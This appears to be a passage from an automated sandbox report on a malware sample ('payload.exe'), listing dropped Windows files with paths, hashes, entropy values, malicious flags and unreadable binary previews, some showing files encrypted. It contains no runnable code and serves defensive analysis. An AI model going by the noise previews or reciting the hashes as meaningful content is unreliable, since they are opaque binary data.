                                                                                                                                                                      Preview:[{"Sy.$.-..............*..m.Z..r.@..w.h..$.1.......v.,.....w..T........._.\..R.nz......'?.d>@c}.-..0....B.;..Tc...]w.oRo.B..#D.4...G..&xp.P.F`.3...L..q.W/R..k_..H.K.&.....t.s.){....P......a.K.... ............ ..ss.y.:03....6..q.R...R...~....vZ6f.{u...>.F.W.{.t..,M?.).`..}+%p.!..B.U@.......7....Fha...(,.w..I-EF.Zyq... .&.IF....Z..0..H~.#..S...l8.ehT%.,.x..O..P.]mP....+.k.i...P{>Vf....`...-.......-...jI.W...0R.Fy......".........K.}....L.Ue.D.U..>..q....q39...V.6K;.k.......bn..i.'o~.I...S....b:...U.?.5O.....W?3..."/.U.#.6.......U..jRku.=..l...;@...... 9............L._\..b..H3...)X.*.H......@i..$.....p..9.\A...M...=.7"!O.K./f.R..X.....6z...lX.P.52.j..zl5..w.O../...v.S.3..R1bC..=.xyVX....H$.m....S.PwL=:.C.9...-u..b......8...... !=.......uG.?...[.s.N.-.....D...N...F.S/.. ...q1Dc...)+...h.=,]........P.z...l..N...E.v..{.`sl......-..zv"...W....9D^...2....P.PD*.'!E.y.}..M/q....!8<N.T.7..A....n...\..S{r._.!..".d.w........b.S.......J...!...b4....{.V

                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\SettingsCache.txt

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):696930
                                                                                                                                                                      Entropy (8bit):6.207681349275024
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12288:j+zZKnOu91dIoGotdYuMOCc5MpzgroTDLgj:OAXI1uMOCc5MpzgroTDLy
                                                                                                                                                                      MD5:72B897D62CCD62D16C724C965838A00D
                                                                                                                                                                      SHA1:6D1FE57AFF4FB44483673E4033950BCC2666716E
                                                                                                                                                                      SHA-256:8C8A292948C8B1B34957949D9058302103CE3654ACCFC942B8F504A76D6380DE
                                                                                                                                                                      SHA-512:324DD71B58933C26BF91AC28D8180BF9EC367CC848BEEDE76C8DCD09D17F72EECA640F58210C5404B00190DF90D6867962D0CDEA8772D24F321D28FC26524AA6
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Preview:[{"Sy8)K.u.K.d}'f..u.G....^.,.4......e..%...0....%m.L...\$.I.Ey....U....ui..F."V#..*....{......s.;N..uO...........;.].f..E....{.(.....v...Y...<$.f.s...p.....FQy..v.6f.....v.I*>......t......[.}..M...0.C...Rl..X.h...>....27._...b.H.R......K......&.5t#j.U.<U..7F8.^.M#7..=y3e......x.[......T..M...g.-.}^...D..9....Y.s].....A...- .c.Q.J....[......rA.....H.%jv.~75.C}....Fk&..#T......N....(..L.m..NB.~\...:.....6.P5..4.m.ni...Z$..|e.o..mu.8..Yb..R;......%..".\...Ih.._...\-.%.E.{<....B..\.x.J....Zv..X.s..s..G..I.(Z.u.X.;.{M.O.......V...Xa.?Au....a6....U..?E.."O.T..s.2w..1.....O..N....~.5.E..@Y1..T..RC^..._\.W......4.+..2....4....w|y..wR..mfM..p7.. .DQ].ll...w., ..ct.)..H.N...q!@;...MM.Q..]...z....J...X.......0.Z....Ty..82.c.r1HPe.Z.d...ATX#....,....w...!+.?..MHN..@i.#x.6...[DY2v.......[..e......#...j.....=..A.Gvs.s.w..).x.q.,....._/6.'[.QL.Q'....p..o..7..LV.........!1..=.J..s...{c.s5.f0..V...a(....[.....6M;.!..@n...t)l.'gd1Z...j...v!.

                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\GLEAM-DARK.svg

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):7458
                                                                                                                                                                      Entropy (8bit):7.9753048493852585
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:Xml3rv8JiGBHv8Iw9eEmLY7qC8caoOOvcNUDUE2f+5Krlj0VI:XQvsXKeNLY7qC83yR2jlj0VI
                                                                                                                                                                      MD5:CA89CAC5A2AAEF0B74EAADF1E2D36FDD
                                                                                                                                                                      SHA1:4AA7EC87BA61ECC2A16AB1E8A61F5FCD2B29ADB7
                                                                                                                                                                      SHA-256:90CD1465652C35725C0B4C83D936AA17D1182B515A2699AD5E6F27F6AE32A77F
                                                                                                                                                                      SHA-512:A7D39B04D7BB4D66E79DB87CB33C38D0F1DF06732900482922A7DBC0B9E331BE1FE985BC28D6C97BC7346C4F2E88C43C01826EDFCF8A43679A84E7C2D1F14455
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<svg .q...R..P...=?O.v.d..(o..k...lI.![.MM....>...7.....T......J.b.......}..=.nXU...gZi...8"G...9.;.9<....S>..G@...S3.l..5.......w....l.+.S...F.s.0l.....[..e..:...,wM|.g.H.}.K..o.p...V.'.n4.&.~...;?..'~...~....g-kV..1b..&.@....r...mD.y.U..O0.[N......R....Os...pj..}.C.. 8R.H....Fk:................Z(. j(...;u.o...z....~Ld...L....J.t9Kr..H.Bk..]]...B....CM..&.i......s..489..@.).Y...d.?..bf,..-..O.(..u|x=Y;:Q.r..?.d.d$C."%.`;....S.X.^.'.)0.{B.A..0:.....B... z......`R......7.jF..1..3.#...(...g.....|D.. ...1.......&*....!.(..r.....v..-. .....Tb..d...`.;........c.N..!......dC...r...V..M!...E..xZDn.oJ.B..'T..S......uqP_b).feke......f.E.n,.[.s 5..n.......m....q..._.....6.,/.........V.j.I?..l.Rv..h[..P....?..~.icS.O.X..:... ..G./..P=.....1..C2.t....;...J...e'q......[+........;:.C..%@.p..N..oD._..>....[.V..<...o.0.M......vl.....ay.7[w.....w>>.......D..NK..........s7...~(.......>'.T.a\/. ...U.krDf3.i/..a K@._h...S.PH.Jym7..7..d=o.g..

                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\GLEAM-LIGHT.svg

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):6854
                                                                                                                                                                      Entropy (8bit):7.971594329405809
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:mCRdNyZjqHjldeJ3N9mPati1WNV6KU2Ym7jtwoMLFg:mqdIADldeV2CIKb/3qFS
                                                                                                                                                                      MD5:6015F9AD575CBD522D579CF307DA3AA8
                                                                                                                                                                      SHA1:1FE777575729BB6C528A0A43CFE74C0A93B5CC12
                                                                                                                                                                      SHA-256:BE86857CA88C729D8159BBBE11B04185EC2418684E36C9A674FA2D99E8E9E7CE
                                                                                                                                                                      SHA-512:AB1F32CC69DF588DE1895C3C81013830C97DA80F256EF365A6ED74C8338E0C12250357A06E643FB96D121EFFB8452BABBA66E01D00F8BE790432B7E587BFF659
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<svg .....d%A.~..i.c.*..!v.Xg....b@.....$Y"S..{..h%L#.....0,...9.g...a..l\.%.....9t...l.....P1c..q.v,1rG.+.M ..P........`.0$..|....9Q&..ob7v....k...*f.i...a.]..W./...njX..`.J..Z.@.W..+T.....!3..N(..y.v<y.........8l.$.....B.xQ.3..)..@.&t.7...\.!.A...B.6*8.=..Y.}NW....}..>.L5..h..G.4....b.]..M........#E4..![..E.."=P...5......[.x......lr.....9..}..g.*X....4.f.....gq#.`....NkSyC-m..`.[.\..Z$.{..t...l.J......{1.i);./..J,.9H.8..$.H...s*hbd..&..Ri".B...3..x8..K..0.hql.(...^.y,..C... ..Mhl.....LWB=........gHA1.!.6...m..I.......M..s.8D.Og"+..dp.....)V<3.P..E<.....w9............w.6=.".BU......82~..CzQ}.w.....$.*5........Ve u2.0\oW;fx.!.E.......kb..-m..s.a9.g..]i:..]..)..p...f9.n....HnP~....g..y..J7#tZ.EX.9`i...-.~...#.[.!..0.5.....H].K.A_..j.].Lu...$.\.d?.....<X/......QLe...}.^....:.....`...@@.JD.....)r.......S9*.A.......h.]..E.4....#.H`.ZcD.z<...?!...#.=.........W~>~..Z..*..c.'.......M.sC.I".B~..}o...0.......-p.?.gQ..I...<....l.r.....B......

                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\IDX_CONTENT_TASKBARHEADLINES.json

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):149024
                                                                                                                                                                      Entropy (8bit):7.998744759232726
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:3072:/2yFF+38b28J/GfLpdzV1cwr1v+1GAyUzIAVdclP:/fFuIJaLbV51v+UvQcF
                                                                                                                                                                      MD5:2BB1FBCD12084724C46305BBBF14CF84
                                                                                                                                                                      SHA1:ECC0CC79A876B8DD738EFDB04D87E9CE5E1B259F
                                                                                                                                                                      SHA-256:66CC5364E562C625A831AAD97E34579CD9A0053492672B964E6A5492473E5A08
                                                                                                                                                                      SHA-512:CB021E575ABC9F9162765CE750C48A43AA4E723EAB18D6ED46BB31538D847E7BA5C08DE8E02E5EEACFE386542208B1F37B47F8D2C83942DF9948C04118FE3706
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Preview:{"loc.y.r... W..U.ftf]s...G....N..X..].c.ul^$.......@,$.@".c:;X....._?.~.3.......q\............,....m....X..96jW`......@..=....R:.m5p....N.&.d.z..G.....lhRD.#.|%.d.....=..9&.&....q:......=Q...QJ....e.y...MZ...:./.r..M...y...7V.8.W......m.......i.a....G...A........G3....n..$.._Y.......V.rMDK+.y...(f]....>.Q...0.:.y..f........2....b...G...].f..T~"r.......<......h......iy..5..i..X..o..F=.....K>M~...0.]j.J_.q..q^H:...)..M.puj...P..].....6.W..(,.X..L..a.....pX....wF......M..........jYxr}..K......F@....;.E&3...........^'Q...(.U.bd\...~.w9../|...W...C.t.F...,P...<..)w.|.G......#a..m0.4.....C.S.e..J.h...V'...r.GibN.q.K...;h.../..K...#an..U.).7h....q..v:.Fp.D.....0..w.....i...2............d...:q.u......c|...s....r....%Hr.....T.....cq..W......Qu.Em......e.>..B.!.-.......k..O.....U.......'X.......3k..L....&.k.2.......=M:U....._`^..F.l8q...nl...Q%D\.....h..q.U}..5.8k.E.N1.?%.O..uZK...a..H-PI..^m.$..._...*D.}...'..'...T.KTRe...9.7.'....

                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.WindowsAlarms_8wekyb3d8bbwe\Settings\settings.dat

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):8526
                                                                                                                                                                      Entropy (8bit):7.975608600247933
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:QjNixvWL0/ZO4yjJfFOyklOaopCPofQFab943jhqzjTO9fp+xxi3mWJgZhhh01OW:Ks5vyRwykl5IQFabE9v27ZK1OSlP+G/
                                                                                                                                                                      MD5:191E90841762EE6ED8BE141D0AA5F6E9
                                                                                                                                                                      SHA1:AE162DC7D91A680CD05A738FA93A424757E4E8FE
                                                                                                                                                                      SHA-256:48577FF7F88F9E257C0144AA878A587D14F629E61AE4CEBDC7DEC1DE1566834B
                                                                                                                                                                      SHA-512:FBE0AFF6DE1692C7D36E52338854159792EE68AF2BA828E514BC059A09EE6C79FDAE55E2E4F67502701879730472DC65D335F7D8EDEFA5F5E5B288721ED24A73
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:regf.8..{...n<.*\.|..e.m.%..!t.K...Q..&7.Ld....X..'..g^.6O..Z&.g..#...U... .[...B.@.y...)............W..u,.Jt..L.....&o........./.G.......I{...-Z...qO.>..U..B.8......D1...W..........T.......d8....zm`.`.7..Z...2.Yjd.1...B.SU.....1..?..k7_.v:I..ws1a.N ....;.G...Bv.<.Z...l.D3e.g.P(9.X..uI.=u#/..X.....B.y.G].]?..y|..m~.Z....41........C.../......v{PN....4M...5.>%B.y.].Y..T.d.5.&<.)..].1p..#.k.S..CD..8I...U.X..[.{....';...E..N,.~.Q.......5(.T.z;.....P....-....I.:..lZ~.Y.v@.....+.W..77gy....V.."&].......r8).`.j..p....8.!.r..U.S81\.}.&.tXn.P...-E..f..lC..0.2oY.m<1FE.!.f3@1..+)e....].3##.k...HY...$d...?,xd.Y..;o.dbJ..2d...*...~...m.w\u....Mv...bp...}..[.kR.h-.N1..G..v..C...4.NL3......qQ.....{o<."0..y.6.d.k5.~.PfCM.WK....L.FT.}...r....Q..~.x...,..z`.[..H.HG%..~7*.Di5.....|.YH+=...0...+.o......b.._ks5w..U~.x(v.....v/'...j.N.(..k2..5...y5d.4.$.c......v.k...;Fc5d.a..Q.3#.....;X..Jx U.....r..u5...-/........!.6.&.?<....6..C.3+......hO(........

                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.WindowsAlarms_8wekyb3d8bbwe\Settings\settings.dat.LOG1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):8526
                                                                                                                                                                      Entropy (8bit):7.977066282573455
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:akp4/Z6NEsuAiLwRRHUDvQ4V5wrm6kTMMvF84PBttzsp1MQ06UMuMuShR:a9Z6NEsfbHKvQL/Q84ZtacQ06Ua
                                                                                                                                                                      MD5:5D99E1DB271EDC1E293ACA7FD81B4339
                                                                                                                                                                      SHA1:3324CEBFCEBBF39465DF6A6D66C6F1239339CCEA
                                                                                                                                                                      SHA-256:7842E02A3815610C89045E04307F3FC20ECD70A1C723712679C25246D0EC5022
                                                                                                                                                                      SHA-512:6CFEB76DB47481E8F56A9D8B0E54FD4D1A5630E735C2CD6FE6884AEE6DC65D6A7FCDD3531F2E1F6717D054D672719CD9158CCD1CF8C10E516F56FF6108D65692
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:regf..0..`r2`j;Lo....8........RDS.....]........#...2..sh....6tYrP.3...s.;%..0.5h..xT.._Q.m...S.eV>.j.M.....I..M..R...E{....."...t `D..M..l.d.........@L.r."..V.QVh.p.yt].n.......W.H......FpQ....eq.....`....O...N..%..v..Ct.U0#.7..j_%......$..`...iz;.....T(.5@..:Q.........>..)..zW...%......8.J.>r..D..a.:........Z..n.......7...B..,.Kj.f.X...{..T].~...:..R..^....<.wi.<..V.<.jpc#.N3..h.T.`i..7...lG.HiS.g....Q.z#..}.L.........F.GH..[k....P.N.....c..0.^...a.5..>4.3..p0...M....M..Q.R.^....jXT.^....l...U..Q...U............f.4...4..s....Wg..\.>.....'X.R/.........t.}Q....;.O..Q(.g...\...#.."..I.po...%.<..~.j.+.et..p4FN..s};.I.R.<..Q1.e#...eM.N$.h..P....e.%..).L$..wK..K...T.C.p0.%0.n..x..L.H.-rc..YE.h..T...z...,..y....?....^&.....<....V.AR.t.$z..XAf...'....-.>W@........=.r..b._.3..)..;QC...=.-9.l.U..O...oeQ.6.!Vl..7.....E...x..>dA..].F.+I^?........X._.#X..@h5%x.....4.%.JHr?.01.....E..6.BA.d.] ...?^.)..,ew...L..D.._........mLa.u=.....jT..F*.Y..!8..

                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\LocalState\DiagOutputDir\LogFile_October_3_2023__13_9_20.txt

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):615
                                                                                                                                                                      Entropy (8bit):7.630413610087426
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:PMbsY2arIc0sVXJEa1JpUN0bCj7MjSQptH91YDAd09SUdNcii9a:UbB9ZbpUNOCvMjSQX9iNw2bD
                                                                                                                                                                      MD5:9ACBBF66EC547A638A28F208668E5777
                                                                                                                                                                      SHA1:D250333ABB2101E8B97DAFC05E5EA212B997DA81
                                                                                                                                                                      SHA-256:099B050F17B0A50AE72D732B6A8150594BF7CDF39913C4972C8A725D6F22D8E4
                                                                                                                                                                      SHA-512:B4DF2C263B9DB714D2F82007CCD60286D635A374429710DDD225339B653CBF77F98653EB6BACC9EEDCF879CF9610C2FC6B07ECA2A079F2F338329CB5D165911E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:[000:..d.c.A..K......#..H..F+|J....@.W.?.O.Y/5..h..w..a.x.u...B.].%...%.3U].m.L.><.&..:....m...i.4.8..xd.....w/.O.M...........S.B\.y.H.]...e.*W.-c...u.../]}..@%.ip....=%.JWa..._`.@...mGa.:q>.lH.....P.....q...(..Q...]..*u.*.p_..@..L......_......G....1.T.m.>H..;ki..).k=...OJ>7<.........W....K..@.|.u..".0_...u<..\{'-.>\.j.d... .B...4.`...._.....3...tA..;.l...N.d{Q........)...E..O..u,.5!>...5...%.....-.'...v..{..gE...Y..jVa.....x.A)....y~r..*....K...X.LJ.u.~f.6u..<.(6/..K.._.^...k.....kgo[.....?.......>.X.m%.{..mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\DESKTOP-AGET0TR-20231004-1157.log

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):102646
                                                                                                                                                                      Entropy (8bit):7.998556509935242
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:3072:a/PuMwdNriRvhgn+1zajxjeOXyxxf81m1c:KuJIR12jwhLW
                                                                                                                                                                      MD5:6E6A4272712522C2D6CE642549D42343
                                                                                                                                                                      SHA1:B26E0B74E141E998284557EEFD042BBEDEEDEEC2
                                                                                                                                                                      SHA-256:2DAD724B30470965A6DF44F682FCC7D13D45FDAD53553878ED3BA2E329985774
                                                                                                                                                                      SHA-512:2A84EE7338958CEB35FB93E40F64B9A8B0A039665B638F5EB22C6E3CC888BB303AB6EE115B3906D06BF36E4337C986FF006771C96E94267E2D987F19E032C1AE
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Preview:..T.i-.&..G.A..K!(.R...t.W.q.T6]....d....Q]Ay.......o4.G......f.^K...c.,1o.m.Qy....?|.....8Y.....!...H..9.!.6s.irD.PpZ...R].H..Hy{,...g.K~....H.5/A~C......\.l4.9.6I..1%...j....`.`.G...!6i.@B..%J.afj.~...f....5R...E3..0..~#._.3l. G.O...d....b..v...m3.../:g.9..`.1G.....5Z.f.!.9.]..#~+...t.....u(..#....eb..7..z.;..........R'.m.p.5.......gq..p&e.D.....?...}.d.p.2..N ....\.]G.p$..\.......j"...+o.'....B..E...,!.'.r.i.%.b.d.g..G..6.j......(}gk.,T..!/^.-e_b......|Z..IC........X.~..n...`..?./x..\.oC?..|33.....U.Q.4el..xdQ.AWO.D.0....K.jHis8.GG...+.Q..B.e....~{..d..Rk...._;.'\.|.<.o.j.g;.@.....k........E.NN....P....c...VJ.M...f..?..)..*.Y+.]u9=.(.}.).X..v..=+r...1."....q.2B_.|......\<.#!...y-.._.0....XH....).w]..!...\...S..!7'..F.....}..a.k..J....hE..k$......".AI..%.X_..$..z..D.U)..N.}.....b4w....@w.9.jQ..Z.Oud4t..E4............. k.>....!n...x.....i....H..Li../`.c....3.....d.Q6.p/...y....f...)...s.b...\...?o.... ...Z..r..N&..q.F.=i.)hXa.=..$

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):8547662
                                                                                                                                                                      Entropy (8bit):5.205002898626682
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:49152:kCqBnJ38OPKW0ANge+q80Ibxh0T4tI6lIfKi5YJj1PKu1ZKKOE:F2nFF1qd/LKNE
                                                                                                                                                                      MD5:C402EA8362EFA8BB3BDFCA9CD62152D2
                                                                                                                                                                      SHA1:3C133C51F0D073EE60AF12A399CABD4AC6BC8D43
                                                                                                                                                                      SHA-256:05F76034DC64F63359286FBC6D2E2366447361A9CBE4FC5B0DAA0A27BEC65B3B
                                                                                                                                                                      SHA-512:A039AF4B7B3A0326CD5289A128B6BC1ED28B770E85B796E22512ABE6E9034A6C11A2B462834F24262DEB18F1F534112384A1A9D8099697D7B01292D84E6F9F37
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:Micros4...S`.5..gM......iSZ.T..A..h.$z.;....!}q..}v7.....x...E.#.m6..@~s.".p........o./.,..u.......RJ..[5.h. ...8.....c.M..>kS.6.#A...Uk\...g...A\....5...z\..........N......e..zw....yt1.pkW.O...&?3...5=]a.0<......^t.j5.Z.:.....$....Pn.9........|...M...;x.\........o"..;@.s.....9...l.....0`...2c.<...6'..."...../.hL.M...fD..7.I[...R{.X..A..Z...~.ds.N>....`..%..'.:.......w|+.,.n.....&.t.b`..3..2...F...*...".Yw...;O......6.[E....o%B0.s...e...Y.:[}gc...t0...S......P._......(.f.{...N...I2nT...........O.Yy..ta.W....H.....m..Z .......j.o+.$.@ ..iz.. .qG.3:.O..r..7...&.....I......U6W^.N..R...%...\.DX..=qx]..R.E..hj...<y..e.VmP^F...?....>Be$;.P...?GM9(W...'1.|."{..$....1........Jq......:.y =..9..,...|.[.N......:.HuW{..yn...B...H7..1.eZ..iR.%.1.5I.H..W.....^.e..1..kA......T.d.....y.>m-M.....,.....(.....N.L..k....I@.c.....f.e.6.\.>.j.bA. ..2D.2.....x....j.......A.L..A..ma..nb...ih...3k..}......Z.P..r1....}3\.6D.UN......o.............iA,.l...

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):8547662
                                                                                                                                                                      Entropy (8bit):5.204993653261307
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:49152:Ir3N38OPKW0ANge+q80Ibxh0T4tI6lIfKi5YJj1PKu1ZKKOY:AF1qd/LKNY
                                                                                                                                                                      MD5:DF7922624156103E9F8665EFE657AE8B
                                                                                                                                                                      SHA1:00B3763A09B8C693C7AF24AA537CB00ADFBFF680
                                                                                                                                                                      SHA-256:EFB242FF48BE326575120F75A02EF3B8BCE246F6D150255CD8477A2BEAA68E8F
                                                                                                                                                                      SHA-512:97FC859C8D9C604E273CB4F844701027286A530C1DD2958D56DDD4449D9C833B2407F23F2C0B5E5D83FB0765FD2A45E72890C94E35FA4B08F2C62B474157670A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:Micro2...5q<..L:.(...4z...d....VH2 E.V!J}8v.`).W..Y...rB...0..ed........F......~;..........n..&T;.....a.h-&.9iYA.-f.....;b....%f.$R.". .Y.<.37:n......>.k..uK.(....2..B..*.....JI.....>/{$.a.u....1.i..SE.b..@V..R<.X-...0.+>UHr...h ..Z.s^..^dcd.2...@}...x.`y.m..M=..>..3B......D.WK...U...L....=..&&.!.)Z.Y.:ZB!'.Z..i..'....T.. ..Ps<.4,1..5..L.dQ,.z.4...v..`.,..V7....:g...&;D3.w.'a..>ef.I3.C..'..3.M.n....Y%.g..u.9.[.0....z+..&)...,....Qe.....i.O]..U.5...Wv.z....g-.na=....z.D[x.VF...6...[...T.....}../.?.s)..p...e.=...wKa.;.|.&.W.JF.Zy...M.Bf...i<.p.I...t..q<..&..j.dz..i....}9..M.hg.;.T..CSI8....i..V...1.............|.......>.d....OB.ir.1..a)..ZY%.[.y.xK......+.....1fo..qV..(.HhD..y2.7. F[wT.w.........},*.....G{H....l1.....v.......T.l9#...e.8.M.....!...7.7/.d1. .gGO..;..k....vR.V.LN.....6"Z..#M-..........B.b>..GBe.cJ+../.p.-..~...|:.=@.......<..0...4.uF.*.r.......%i.DR..~...%*z.[BO..=0...."9.C>.s.T.?...T.....&..D}Yw.........D%..l.c@.

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1192270
                                                                                                                                                                      Entropy (8bit):5.662603320691926
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12288:+JgN5539kO59JQ4aKVmaS4aMz8Pg3lxJo2cvXtK:+JAr7BaKVzaYcAqtK
                                                                                                                                                                      MD5:EB8D9AA151E196F10E79366D874A5D27
                                                                                                                                                                      SHA1:5BE62D8CA863CA761E631AE27697324E9C64D5A0
                                                                                                                                                                      SHA-256:88EEE91050FCAB7F62FF77129B8FB965C78B11E59DE4093045B4651190D1AAB5
                                                                                                                                                                      SHA-512:0E4C9F37D5C894D74AE7C890EEE03A7B4A00F61B57BBF39DB1EF5356426300A59BA3DF0E3308B3061DE0B47B49FEDC3A464A08CDD15503ACF436105E89EDD295
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:Micro.HP.R...OG......*......E..NTVx...0...~.}b6.K.n...G..Y.t]...6I..$r\.%...|..\.q.....j......g.YH.6Kpwi....!...j..WZl..^.X'.......o.r.QW[2B.j...e..I.y.z.-.Pec.y....*.r.F...W.I.....)....q.8....r.......8C.....Y.........EC.-..."...&..0..'>~.........jW.X.N;C.?#>$7....K....u&|w.....m...I\vo5.y^.&H.bP..|..s.`.n..?.;.]r.....P.`.....5W.c...CN.$V.]...)9..Jn=..aFyN....oxi. ..:........~.(Ev..9.f...f.L.$...............s..U.p.a:..p.!m.+..ll.....p..@.3:.......=#.....9YjL...f...6.F|u.._..%..']..o..hu.+t.A...3...A..$.......Q...l.?.(V3|....Szrj..i../.....U.?..-yr.S..s}Z..'.(b.....7....,.I.S......L....HY..i}.".}3_J......R...a.....p..g...3..............L.yx.EB..F)...S`>Y...x...A....h...c.W./...^C.Z...*....?.......A.....Y....{....j.8....]o,.....w.;......5Wd.ki...J'.%......NO+!..^Y.)..o..@.^.f..z...Hm\..$.L..x#....._.s.q..|..e.C..T..}..F.Q%....Ce.~tti.../A..o7.&.N........L.r.5...2........B.....+.l..ia...u.....J`.../...t.S.u:.....0).M..$...+.0..:.<.^

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1192270
                                                                                                                                                                      Entropy (8bit):5.6628843005086935
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12288:6Vara59Z/YNMeJQ4aKVmaS4aMz8Pg3lxJo2cvXtG:6srg/YSeBaKVzaYcAqtG
                                                                                                                                                                      MD5:90C162170598DBE784F5EE4829AC9FBC
                                                                                                                                                                      SHA1:8FCC20B09D9BB969902A93E779581554BBBBDD6E
                                                                                                                                                                      SHA-256:95633921B215BFE06782E230C3774EB902884E26C4F81D3613C10DE596517CE0
                                                                                                                                                                      SHA-512:183332B8150DE0EDBBD86A6BB2A90E6219DC5786D7E63A373402252E59022E492BF28ABE1C9A53D7D25EEF91390BFD66B50F08CB4F1B1482D1DDABFEFE9DF65E
                                                                                                                                                                      Malicious:false
